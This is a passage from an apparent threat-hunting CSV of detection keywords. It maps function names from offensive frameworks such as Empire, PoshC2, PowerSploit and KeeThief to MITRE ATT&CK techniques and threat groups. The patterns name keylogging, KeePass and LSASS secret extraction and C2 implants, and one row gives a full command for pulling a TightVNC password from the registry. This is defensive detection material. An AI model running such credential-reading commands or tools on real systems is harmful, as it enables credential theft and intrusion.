TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*get-implantworkingdirectory*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
+"*Get-InactiveDomainAdmins*","offensive_tool_keyword","HoneypotBuster","Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host","T1083 - T1059.001 - T1112","TA0007 - TA0002","N/A","N/A","Lateral Movement","https://github.com/JavelinNetworks/HoneypotBuster","1","0","N/A","8","3","270","60","2017-12-05T13:03:11Z","2017-07-22T15:40:44Z"
+"*Get-InternetExplorerBookmarks*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*Get-InternetExplorerHistory*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*Get-ItemProperty -Path HKLM:\Software\TightVNC\Server -Name *Password* | select -ExpandProperty Password*","offensive_tool_keyword","AD exploitation cheat sheet","TightVNC password (convert to Hex then decrypt with e.g.: https://github.com/frizb/PasswordDecrypts)","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*Get-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name *RunAsPPL*","offensive_tool_keyword","AD exploitation cheat sheet","Sometimes LSASS is configured to run as a protected process (PPL). 
You can query this with PowerShell as follows.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","POST Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*Get-KeePassConfigTrigger*","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1213 - T1215 - T1566","TA0005 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","9","863","151","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z"
+"*Get-KeePassDatabaseKey*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*Get-KeePassDatabaseKey*","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1213 - T1215 - T1566","TA0005 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","9","863","151","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z"
+"*Get-KeePassINIFields*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*Get-KeePassXMLFields*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*Get-KeystrokeData*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
+"*Get-Keystrokes 
*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z"
+"*Get-Keystrokes*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1067","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*get-keystrokes*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
+"*Get-Keystrokes*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z"
+"*Get-Killdate*","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1050","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*get-killdate*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" 
+"*Get-KIWI_KERBEROS_LOGON_SESSION*","offensive_tool_keyword","powerextract","This tool is able to parse memory dumps of the LSASS process without any additional tools (e.g. Debuggers) or additional sideloading of mimikatz. It is a pure PowerShell implementation for parsing and extracting secrets (LSA / MSV and Kerberos) of the LSASS process","T1003 - T1055 - T1003.001 - T1055.012","TA0007 - TA0002","N/A","N/A","Credential Access","https://github.com/powerseb/PowerExtract","1","0","N/A","N/A","1","99","14","2023-07-19T14:24:41Z","2021-12-11T15:24:44Z"
+"*Get-LastLoggedon -*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard 
Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*Get-LastLoggedOn*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z"
+"*getLocalAdm*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z"
+"*Get-LoggedOnLocal -*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*Get-LoggedonLocal -ComputerName *","greyware_tool_keyword","powershell","PowerView get Locally logged users on a machine","T1069.002 - T1087.002 - T1018","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
+"*Get-LsaRunAsPPLStatus*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - 
TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z"
+"*Get-LSASecret*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z"
+"*Get-ModifiableRegistryAutoRun*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*Get-ModifiableRegistryAutoRun*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z"
+"*Get-ModifiableScheduledTaskFile*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*Get-ModifiableScheduledTaskFile*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z"
+"*Get-ModifiableService*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z"
+"*Get-MpComputerStatus*","greyware_tool_keyword","powershell","Gets the status of antimalware software on the computer.","T1063","TA0005 - TA0007","N/A","N/A","Discovery","https://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/","1","0","N/A","10","10","N/A","N/A","N/A","N/A"
+"*Get-NetComputer -Unconstrainuser*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
